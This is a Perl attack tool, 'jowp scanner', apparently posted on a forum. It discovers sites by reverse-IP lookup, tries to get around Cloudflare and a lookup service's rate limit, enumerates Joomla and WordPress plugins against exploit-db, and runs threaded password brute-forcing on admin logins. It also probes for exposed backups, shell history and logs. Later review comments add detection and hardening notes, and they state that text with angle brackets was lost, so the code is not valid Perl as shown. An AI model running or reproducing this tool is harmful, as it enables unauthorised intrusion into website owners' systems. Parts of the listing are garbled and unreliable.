
[HIDE-THANKS]
[LENGUAJE=perl]#!/usr/bin/perl
# jowp scanner 0.1
# © sec4ever
use LWP::UserAgent;
use WWW::Mechanize;
use threads;
# Global setup and input dispatch. The file has no `use strict` or
# `use warnings`, so every variable assigned here is a package global that
# the subs below read and modify directly ($ua, $defext, $threads, @sites).
# NOTE(review): this listing lost text in extraction wherever the original
# contained angle brackets. The readline on the `$choice=;` line and the
# open() argument in the .txt branch are truncated, so the code is not valid
# Perl as shown.
$ua = LWP::UserAgent->new(keep_alive => 1);
# Every request sent through $ua carries this fixed, dated Firefox 3.5
# string; the exact value is a usable match key in web-server and proxy logs.
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
$ua->timeout(30);
# Fallback file extension used by checkfiles() when no X-Powered-By header
# identifies the platform.
$defext = "php";
# Unbuffered STDOUT, so the "\r" progress lines appear immediately.
$| = 1;
# Upper bound on concurrently running login threads (see brutwordpress and
# brutjoomla).
$threads = 10;
head();
print "[+] Enter ip - site[(s) file] : ";
$choice=;
chomp($choice);
# Three input forms, tested in order: something starting with a dotted quad,
# something containing ".txt", anything else (treated as a host name).
# The IP pattern is anchored only at the start and does not range-check the
# octets, so input such as "999.1.1.1/x" also takes the first branch.
if ($choice =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/)
{
print " + you're entering an ip address : ".$choice."\n";
dojob($choice);
}
elsif($choice =~ /\.txt/)
{
print " + you are entering a file : ".$choice."\n";
open(sites, "
@sites=;
close(sites);
print " + Total Sites : ".scalar(@sites)."\n";
}else{
print " + you are entering a site : ".$choice."\n";
$ip = getip($choice);
print " + ip : ".$ip."\n";
dojob($ip);
}
# Runs the reverse-IP lookup for the address in $_[0] (ureverse) and then
# reloads the global @sites from a file.
# NOTE(review): the open() argument and the readline were truncated in
# extraction. Presumably the file is the "sites-<ip>.txt" that ureverse()
# writes through savefile(); confirm against an intact copy.
sub dojob {
ureverse($_[0]);
open(sites, "
@sites=;
close(sites);
}
# Main loop: one pass per entry in the global @sites.
# The front page is fetched over plain HTTP and the CMS is guessed from
# case-sensitive substring matches on the body alone, so any page that merely
# mentions "joomla" or "com_" is classified as Joomla before the WordPress
# patterns are tried.
# Seen from the target's logs, each classified site receives, in order: one
# GET of "/", the component/plugin enumeration request, the login attempts,
# and then the directory and file probes made by check().
foreach $site (@sites)
{
chomp($site);
$main = $ua->get("http://".$site."/")->content;
if ($main =~ m/joomla/ || $main =~ m/\/component\// || $main =~ m/com\_/) {
print " * ".$site." joomla\n";
scanjoomla($site);
brutjoomla($site);
check($site);
} elsif ($main =~ /wordpress/ || $main =~ /wp\-content/ || $main =~ /wp\-includes/)
{
print " * ".$site." wordpress\n";
scanwordpress($site);
brutwordpress($site);
check($site);
}else{
# Unrecognised sites still get the generic path probes.
print " * ".$site." unknown\n";
check($site);
}
}
# Run both generic path probes against one host: the wordlist-driven
# directory scan first, then the fixed list of common file names.
#   $_[0]  host name, without scheme
sub check {
    my ($host) = @_;
    checkdirs($host);
    checkcommon($host);
}
# Reverse-IP lookup: posts the address in $_[0] to a third-party web service
# (form field remoteAddress) and appends every domain found in the reply to
# "sites-<address>.txt" through savefile().
# When the service answers with its daily-limit message, the shared $ua is
# switched to a proxy chosen by gproxy() and the request is repeated via goto.
# NOTE(review): the retry has no bound. If gproxy() returns without finding a
# working proxy, the same request is re-sent indefinitely.
# NOTE(review): %group is a package global that is never cleared, so a second
# call would write the domains collected by the first call as well.
# If the reply matches neither pattern the sub returns without any output.
sub ureverse {
reversesned:
$response = $ua->post("http://domains.yougetsignal.com/domains.php",
{ remoteAddress => $_[0]});
$pwnd = $response->content;
if ($pwnd =~ /Daily reverse IP check limit reached for/)
{
print " - limit reached, bypassing ...\n";
$getproxy = gproxy();
$ua->proxy('http', $getproxy);
goto reversesned;
}elsif ($pwnd =~ /\"domainCount\":\"(.*?)\"/){
print " + Total Sites : ".$1."\n";
# Hash keys are used to de-duplicate the domain names.
while ($pwnd =~ m/\[\"(.*?)\",/sg){
$group{$1} = undef;
}
foreach $s (keys %group) {
savefile("sites-".$_[0].".txt",$s);
}
}
}
# Picks a proxy from proxies.txt: each entry is installed on the shared $ua
# and tested with a GET to the reverse-IP service; the first entry whose reply
# does not contain the daily-limit message is returned.
# NOTE(review): the readline on the `@proxys=;` line was truncated in
# extraction.
# NOTE(review): open() is unchecked, and when no entry passes the test the sub
# falls off the end of the loop without an explicit return, leaving $ua set to
# the last proxy tried.
sub gproxy {
open(DAT,"proxies.txt");
@proxys=;
close(DAT);
foreach $proxy (@proxys)
{
chomp($proxy);
# Entries without a scheme are treated as plain-HTTP proxies.
$proxy = "http://".$proxy if ($proxy !~ m/http:\/\//);
$ua->proxy('http', $proxy);
if ($ua->get("http://domains.yougetsignal.com/domains.php")->content !~ /Daily reverse IP check limit reached for/)
{
print "+ ".$proxy." valid \n";
$ua->proxy('http', $proxy);
return $proxy;
}
}
}
# Resolves the host name in $_[0] to an address by requesting its front page
# and reading the response headers as a string.
#   - "Server: cloudflare-nginx" present: runs cloudbypass() and subdom(),
#     which only print candidates, then asks the operator to type the address
#     to use.
#   - otherwise: returns the address from the Client-Peer header.
# NOTE(review): the readline inside `chomp($nip=)` was truncated in
# extraction.
# NOTE(review): in the final branch `$!;` is an expression with no effect, and
# because print is the last statement executed its return value is what the
# caller receives and passes on to dojob().
sub getip {
$getip = $ua->get("http://".$_[0]."/");
$getiphead = $getip->headers()->as_string;
if ($getiphead =~ /Server: cloudflare-nginx/)
{
print " + Cloudflare Detected , bypassing ...\n";
cloudbypass($_[0]);
subdom($_[0]);
print "\n * Enter an ip to use : ";
chomp($nip=);
return $nip;
}elsif ($getiphead =~ /Client-Peer: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):/)
{
chomp($1);
return $1;
}
else{
$!;
print " error here 1\n";
}
}
# Posts the host name in $_[0] to a third-party lookup service (form field
# cfS) and prints the first dotted quad found anywhere in the reply. Nothing
# is returned to the caller; the result is only shown to the operator.
# NOTE(review): the pattern accepts any four dot-separated digit groups in the
# page, so the printed value is not necessarily an address of the target.
# The exposure this depends on is an origin server that still answers direct
# connections; restricting the origin to the CDN's address ranges removes it.
sub cloudbypass{
my $cloudbypass = $ua->post("http://www.cloudflare-watch.org/cgi-bin/cfsearch.cgi",
{
cfS => $_[0],
});
if ($cloudbypass->content =~ m/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/){
chomp($1);
print " + method 1, ip : ".$1."\n";
}else{
print " - Can't, using method 2 \n";
}
}
# Requests http://<label>.<host>/ for every label in subs.txt and prints, per
# name, the peer address from the Client-Peer header and whether the response
# carried the "Server: cloudflare-nginx" header.
# A "Client-Warning: Internal response" header is treated as "name not found".
# NOTE(review): the readline on the `@subs=;` line was truncated in
# extraction, and open() is unchecked.
# What this reports is any subdomain whose DNS record points straight at the
# origin instead of the CDN; auditing those records is the corresponding
# check on the defending side.
sub subdom {
open(subs,"subs.txt");
@subs=;
close(subs);
foreach $sub (@subs)
{
chomp($sub);
$getsub = $ua->get("http://".$sub.".".$_[0]."/");
$getsubhead = $getsub->headers()->as_string;
if ($getsubhead !~ /Client-Warning: Internal response/)
{
if ($getsubhead !~ /Server: cloudflare-nginx/)
{
print " + ".$sub.".".$_[0]." ";
print $getsubhead =~ /Client-Peer: (.*?):/ ? $1."\n" : " can't get ip\n";
}
else
{
print " + ".$sub.".".$_[0]." ";
print $getsubhead =~ /Client-Peer: (.*?):/ ? $1." is under cloudflare\n" : " can't get ip\n";
}
}else{
print " - ".$sub.".".$_[0]." not found\n";
}
}
}
# Lists the Joomla components referenced in the markup of /index.php on the
# host in $_[0] and passes each name to checkexdb().
# Component names are taken from four URL shapes found in the page body; the
# hashes are used only to de-duplicate within each shape.
# Everything reported here comes from a single anonymous GET of a public page.
# NOTE(review): %compo1..%compo4 and @compo are package globals that are never
# reset, so names collected for one site are reported again for every later
# site.
sub scanjoomla {
$scanjoom = $ua->get("http://".$_[0]."/index.php");
$scanjoomcont = $scanjoom->content;
while ($scanjoomcont =~ /\/components\/(.*?)\//gi){$compo1{$1} = undef;}
while ($scanjoomcont =~ /\?option=(.*?)\&amp\;/gi){$compo2{$1} = undef;}
while ($scanjoomcont =~ /\/component\/option\,(.*?)\//gi){$compo3{$1} = undef;}
while ($scanjoomcont =~ /\/index\.php\/component\/(.*?)\//gi){$compo4{$1} = undef;}
#\/index\.php\/component\/(.*?)\/
foreach $com1 (keys %compo1) {push(@compo,$com1);}
foreach $com2 (keys %compo2) {push(@compo,$com2);}
foreach $com3 (keys %compo3) {push(@compo,$com3);}
foreach $com4 (keys %compo4) {push(@compo,$com4);}
print " + components \n";
foreach $com (uniq(@compo))
{
print "\t\t# ".$com." : ";
checkexdb($com);
}
print "\n";
}
# Lists the WordPress plugin directory names (and one theme name) referenced
# in the front-page markup of the host in $_[0] and passes each to
# checkexdb().
# Everything reported here comes from a single anonymous GET of a public page.
# NOTE(review): %plug1 and @plug are package globals that are never reset, so
# names collected for one site are reported again for every later site.
sub scanwordpress {
#preg_match_all('#/wp-content/plugins/(.*?)/#si', $metals , $amks );
#preg_match_all('##si', $metals , $amks2 );
#
$scanwp = $ua->get("http://".$_[0]."/");
$scanwpcont = $scanwp->content;
while ($scanwpcont =~ /\/wp\-content\/plugins\/(.*?)\//gi){$plug1{$1} = undef;}
# `if` rather than `while`: only the first theme path in the page is kept.
if ($scanwpcont =~ /\/wp\-content\/themes\/(.*?)\//gi){push(@plug,$1);}
foreach $plu1 (keys %plug1) {push(@plug,$plu1);}
print " + plugin \n";
foreach $plu (uniq(@plug))
{
print "\t\t# ".$plu." : ";
checkexdb($plu);
}
print "\n";
}
# Searches a public advisory database for the name in $_[0] and prints the
# matching entries, or "no exploit" when the results page says there are none.
# NOTE(review): $_[0] is concatenated into the query string without URI
# escaping, so a name containing "&" or "#" changes the request.
# NOTE(review): as shown, the capture group is lazy and followed only by an
# optional newline class, so it always captures the empty string. The pattern
# probably lost HTML markup in extraction (see the garbled comment below).
# NOTE(review): `@ex[1]` and `@ex[0]` are one-element slices where `$ex[1]`
# and `$ex[0]` were meant, and `@ex = undef` leaves a one-element list
# holding undef rather than an empty array.
sub checkexdb {
$checkexdbex = $ua->get("http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$_[0]."&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve");
$checkexdbexcont = $checkexdbex->content;
#s http://www.exploit-db.com/exploits/'>http://www.exploit-db.com/exploits/
my %checkjoomex;
if ($checkexdbexcont !~ /\">No results/)
{
while ($checkexdbexcont =~ m/\/exploits\/(.*?)[\n]?/gi)
{
$checkjoomex{$1} = undef;
}
foreach $ex (keys %checkjoomex) {
@ex = split(/">/,$ex);
print "\n\t\t\t ".@ex[1]."\n";
print "\t\t\t http://www.exploit-db.com/exploits/".@ex[0]."\n";
}
}
else
{
print "no exploit\n";
}
@ex = undef;
}
# Drives password guessing against the WordPress login of the host in $_[0]:
# builds a user list and a password list, then starts one thread per
# (user, password) pair running bfwp2(), never letting more than $threads run
# at once, and joins them all at the end.
# The user list is the single name returned by getadminwp() when there is one;
# otherwise it is read from a file and extended with values derived from the
# host name.
# NOTE(review): this block was damaged in extraction. The `if (length($bwpu)`
# condition is cut short and both open() calls and their readlines lost their
# arguments, so the code is not valid Perl as shown.
# NOTE(review): `@usrs = undef` and `@pwds = undef` leave a one-element list
# holding undef rather than an empty array.
# On the target this appears as a GET of /wp-login.php followed by a POST for
# every pair, all from one client with one User-Agent; login rate limiting,
# lockout and a second factor are the controls that stop it.
sub brutwordpress {
@usrs = undef;
@pwds = undef;
print " + bruteforcing (threads: $threads)\n";
$bwpred = "http://".$_[0]."/wp-admin/";
$bwpu = getadminwp($_[0]);
if (length($bwpu)
print " - faild to get admin name, using list\n";
open (usr, "
@usrs = ;
close usr;
@usergenwp = split(/\./,$_[0]);
push(@usrs,$_[0]);
push(@users,@usergenwp[0]);
}else{
print " + found admin name : ".$bwpu."\n";
@usrs = ($bwpu);
}
open (pwd, "
@pwds = ;
close pwd;
@passgenwp = split(/\./,$_[0]);
push(@pwds,@passgenwp[0]);
foreach $usr (@usrs) {
foreach $pwd (@pwds) {
chomp($usr);
chomp($pwd);
push(@threads, threads->create (\&bfwp2, $_[0],$usr,$pwd,$bwpred));
sleep(1) while(scalar threads->list(threads::running) >= $threads);
}
}
$_->join foreach @threads;
@threads = ();
}
# Thread body started by brutwordpress(): performs one login attempt.
#   $_[0] host   $_[1] user name   $_[2] password   $_[3] redirect_to value
# Loads /wp-login.php, submits the form with the fields log, pwd, redirect_to
# and testcookie=1, and reports success when the resulting page contains
# "wp-admin/load-styles".
# NOTE(review): the eval block swallows every failure and $@ is never
# inspected, so a network or form error is printed as an ordinary failed
# guess.
# NOTE(review): the request goes over plain HTTP and both outcomes print the
# tried password to STDOUT in clear text.
sub bfwp2
{
eval {
$wpbf = WWW::Mechanize->new(timeout => 10);
$wpbf->get("http://".$_[0]."/wp-login.php");
$wpbf->submit_form(
fields => {
"log" => $_[1],
"pwd" => $_[2],
"redirect_to" => $_[3],
"testcookie" => "1",});
};
if($wpbf->content() =~ /wp-admin\/load-styles/){
print "\t# cracked, user: ".$_[1]." pass: ".$_[2]."\n";
}else{
print "\t- faild, user: ".$_[1]." pass: ".$_[2];
print "\n";
}
}
# Drives password guessing against the Joomla administrator login of the host
# in $_[0]: obtains the form token name with getjooken(), reads a user list
# and a password list from files, adds the host name and its first label to
# both, then starts one thread per (user, password) pair running bfjo2(),
# never letting more than $threads run at once.
# NOTE(review): both open() calls and their readlines lost their arguments in
# extraction, so the code is not valid Perl as shown.
# NOTE(review): `@usrs = undef` and `@pwds = undef` leave a one-element list
# holding undef rather than an empty array.
# On the target this appears as repeated GET and POST requests to
# /administrator/index.php from one client; login rate limiting, lockout and a
# second factor are the controls that stop it.
sub brutjoomla {
@usrs = undef;
@pwds = undef;
print " + bruteforcing (threads: $threads)\n";
$jotoken = getjooken($_[0]);
open (usr, "
@usrs = ;
close usr;
open (pwd, "
@pwds = ;
close pwd;
push(@usrs,$_[0]);
push(@pwds,$_[0]);
@authgen = split(/\./,$_[0]);
push(@usrs,@authgen[0]);
push(@pwds,@authgen[0]);
foreach $usr (@usrs) {
foreach $pwd (@pwds) {
chomp($usr);
chomp($pwd);
push(@threads, threads->create (\&bfjo2, $_[0],$usr,$pwd,$jotoken));
sleep(1) while(scalar threads->list(threads::running) >= $threads);
}
}
$_->join foreach @threads;
@threads = ();
}
# Thread body started by brutjoomla(): performs one login attempt.
#   $_[0] host   $_[1] user name   $_[2] password   $_[3] token field name
# Loads /administrator/index.php, submits the form with username, passwd,
# task=login and the token field set to '1', and reports success when the
# resulting page mentions com_categories, com_config or com_admin.
# NOTE(review): the eval block swallows every failure and $@ is never
# inspected, so a network or form error is printed as an ordinary failed
# guess.
# NOTE(review): the request goes over plain HTTP and both outcomes print the
# tried password to STDOUT in clear text.
sub bfjo2
{
eval {
$jobfr = WWW::Mechanize->new(timeout => 10);
$jobfr->get("http://".$_[0]."/administrator/index.php");
$jobfr->submit_form(
fields => {
username => $_[1],
passwd => $_[2],
task => 'login',
$_[3] => '1',
});
};
if($jobfr->content() =~ /com_categories/i || $jobfr->content() =~ /com_config/i || $jobfr->content() =~ /com_admin/i){
print "\t# cracked, user: ".$_[1]." pass: ".$_[2]."\n";
}else{
print "\t- faild, user: ".$_[1]." pass: ".$_[2];
}
print "\n";
}
# Tries to learn a WordPress login name for the host in $_[0] by requesting
# the author archive of user id 1 ("?author=1") and reading a name from the
# page body or, failing that, from the Title header.
# Returns the captured name, or nothing when neither pattern matches.
# NOTE(review): the first pattern was damaged in extraction (it spans two
# lines and has lost its markup), so what it originally matched cannot be
# told from this listing.
# NOTE(review): the URL is built as "http://<host>?author=1" with no "/"
# before the query string.
# Author archives reveal account names to anonymous visitors; a site that
# disables or redirects them removes this source, and login names should not
# be relied on as secrets in any case.
sub getadminwp {
$getadmin = $ua->get("http://".$_[0]."?author=1");
$getadminhead = $getadmin->headers()->as_string;
$getadmincont = $getadmin->content;
if ($getadmincont =~ /
(.*?) \| /)
{
chomp($1);
return($1);
}elsif ($getadminhead =~ /Title: (.*?) /)
{
chomp($1);
return($1);
}
}
# Requests http://<host>/<dir>/ for every directory name in a wordlist file,
# prints a running found / not-found line for each, and then calls
# checkfiles() once for every directory that was reported as found.
# NOTE(review): the open() argument and the readline were truncated in
# extraction, so the code is not valid Perl as shown.
# NOTE(review): "found" means only that the status line does not contain
# "404". Redirects, 403 and 5xx answers are all counted as found, and a site
# that answers 200 for every path makes every entry a hit.
# NOTE(review): `@tocheckfiles = undef` seeds the list with one undef element,
# which uniq() passes on to checkfiles() as an empty directory name.
# In access logs this is a rapid run of directory requests from one client,
# most of them answered 404.
sub checkdirs {
print " + scanning dirs \n";
open (dir, "
@dirs =
;
close dir;
$countd=0;
@tocheckfiles = undef;
foreach $dir (@dirs) {
chomp($dir);
$countd++;
$scanp = $ua->get("http://".$_[0]."/".$dir."/");
if ($scanp->status_line !~ /404/){
if ($scanp->status_line =~ /Bad hostname\)/)
{
print "\t - cant connect to site\n";}else{
print "\r\t ".$countd."/".scalar(@dirs)." + found : http://".$_[0]."/".$dir."/ ".$scanp->status_line."\n";
push(@tocheckfiles,$dir);
}}
else{
print "\r\t ".$countd."/".scalar(@dirs)." - not found : http://".$_[0]."/".$dir."/ ";
}
}
print "\n";
foreach $tocheckdir (uniq(@tocheckfiles)) {checkfiles($_[0],"/".$tocheckdir);}
}
# Requests http://<host><dir>/<name>.<ext> for every name in a wordlist file
# and prints a running found / not-found line for each.
#   $_[0] host   $_[1] directory path, starting with "/"
# The extension list is chosen from the X-Powered-By header of the front
# page: "php" for PHP, "aspx" and "asp" for ASP.NET, otherwise the global
# $defext.
# NOTE(review): the open() argument and the readline were truncated in
# extraction, so the code is not valid Perl as shown.
# NOTE(review): as in checkdirs(), any status line without "404" is counted
# as found.
# NOTE(review): the front page is fetched again on every call only to re-read
# the same header.
sub checkfiles {
# bam bam

print " + scanning files for dir : ".$_[1]."\n";
open (path, "
@paths = ;
close path;
$countp=0;
$scanpi = $ua->get("http://".$_[0]."/");
$scanphead = $scanpi->headers()->as_string;
if ($scanphead =~ /X-Powered-By\: PHP/){@ext = ("php");print "\t using extention : php for files\n";}elsif($scanphead =~ /X-Powered-By\: ASP\.NET/){ @ext = ("aspx","asp"); print "\t using extention : aspx,asp for files\n"; }else{@ext = ($defext); print "\t using default extention : ".$defext." for files\n";}
foreach $filescan (@paths) {
chomp($filescan);
$countp++;
foreach $fext (@ext)
{
$scanp = $ua->get("http://".$_[0].$_[1]."/".$filescan.".".$fext);
if ($scanp->status_line !~ /404/){
if ($scanp->status_line =~ /Bad hostname\)/)
{
print "\t - cant connect to site\n";}else{
print "\r\t ".$countp."/".scalar(@paths)." + found : http://".$_[0].$_[1]."/".$filescan.".".$fext." ".$scanp->status_line."\n";
}
}
else{
print "\r\t ".$countp."/".scalar(@paths)." - not found : http://".$_[0].$_[1]."/".$filescan.".".$fext;
}
}
}
print "\n";
}
# Requests a fixed list of file names directly under the web root of the host
# in $_[0] and prints a running found / not-found line for each.
# The list names leftover test and upload scripts, site backups in several
# archive formats, a shell history file and server logs: files that should
# never be reachable from a document root.
# The names are requested exactly as written here, including the misspelt
# "pulic_html.rar", which makes this sequence recognisable in access logs.
# NOTE(review): any status line without "404" is counted as found, so
# redirects, 403 answers and catch-all pages are reported as hits.
sub checkcommon {
print " + scanning common files \n";
@cpaths = ("validator.php","uploader.php","vbseo.php","test.txt","test.zip","public_html.zip","pulic_html.rar","public_html.tar.gz","backup.zip","backup.tar.gz",".bash_history","error_log","domlogs");
$countcp=0;
foreach $filecscan (@cpaths) {
chomp($filecscan);
$countcp++;
$scanpc = $ua->get("http://".$_[0]."/".$filecscan);
if ($scanpc->status_line !~ /404/){
if ($scanpc->status_line =~ /Bad hostname\)/)
{
print "\t - cant connect to site\n";}else{
print "\r\t ".$countcp."/".scalar(@cpaths)." + found : http://".$_[0]."/".$filecscan." ".$scanpc->status_line."\n";
}
}
else{
print "\r\t ".$countcp."/".scalar(@cpaths)." - not found : http://".$_[0]."/".$filecscan;
}
}
print "\n";
}
# Fetches the Joomla administrator login page of the host in $_[0] and returns
# the first run of 32 hexadecimal characters found in it, which the caller
# uses as the name of the form's token field.
# NOTE(review): the pattern is not tied to any form field, so any 32-character
# hex string in the page (a cache-busting hash, for example) is returned.
# NOTE(review): `next` is used here outside any loop in this sub. Perl applies
# it to the nearest loop in the calling chain, the per-site foreach at file
# level, so a missing token abandons the rest of that site's processing, and
# under `use warnings` it is reported as "Exiting subroutine via next".
sub getjooken {
$gjotoken = WWW::Mechanize->new();
$gjotoken->get("http://".$_[0]."/administrator/index.php");
if($gjotoken->content() =~ /([0-9a-fA-F]{32})/){
print " + found token \n";
chomp($1);
return $1;
} else {
print " - can't get token \n";
next;
}
}
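# Append one line of text to a file, creating the file if it does not exist.
#   $_[0]  path of the file to append to
#   $_[1]  text to write; a newline is added after it
# Returns 1 on success. On failure a warning is written to STDERR and the sub
# returns false instead of silently printing to an unopened handle.
sub savefile {
    my ($path, $text) = @_;

    # Three-argument open keeps the mode separate from the path, so characters
    # in $path can never be read as part of the open mode, and a lexical
    # handle replaces the shared bareword handle.
    open(my $fh, '>>', $path) or do {
        warn "savefile: cannot open $path: $!\n";
        return;
    };

    print {$fh} $text."\n";

    # Buffered write errors only surface at close time.
    close($fh) or do {
        warn "savefile: cannot close $path: $!\n";
        return;
    };

    return 1;
}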
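# Return the distinct values of the argument list.
# Values are compared as strings and the first occurrence of each is kept, in
# input order. (The previous hash-keys form returned them in hash order, which
# differs from run to run and made the callers' reports unstable.)
# An undefined argument is treated as the empty string, as it was before.
# In scalar context the number of distinct values is returned.
sub uniq {
    my %seen;
    my @distinct;
    for my $item (@_) {
        my $key = defined $item ? "$item" : '';
        push @distinct, $key unless $seen{$key}++;
    }
    return @distinct;
}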
# Prints the startup banner (tool name and credit line) to STDOUT.
# NOTE(review): the BBCode closing tags after the final brace are forum markup
# fused onto the last line of the listing, not part of the Perl source.
sub head {
print qq {
[+] jowp scanner 0.1
[+] © sec4ever
}
}[/LENGUAJE][/HIDE-THANKS]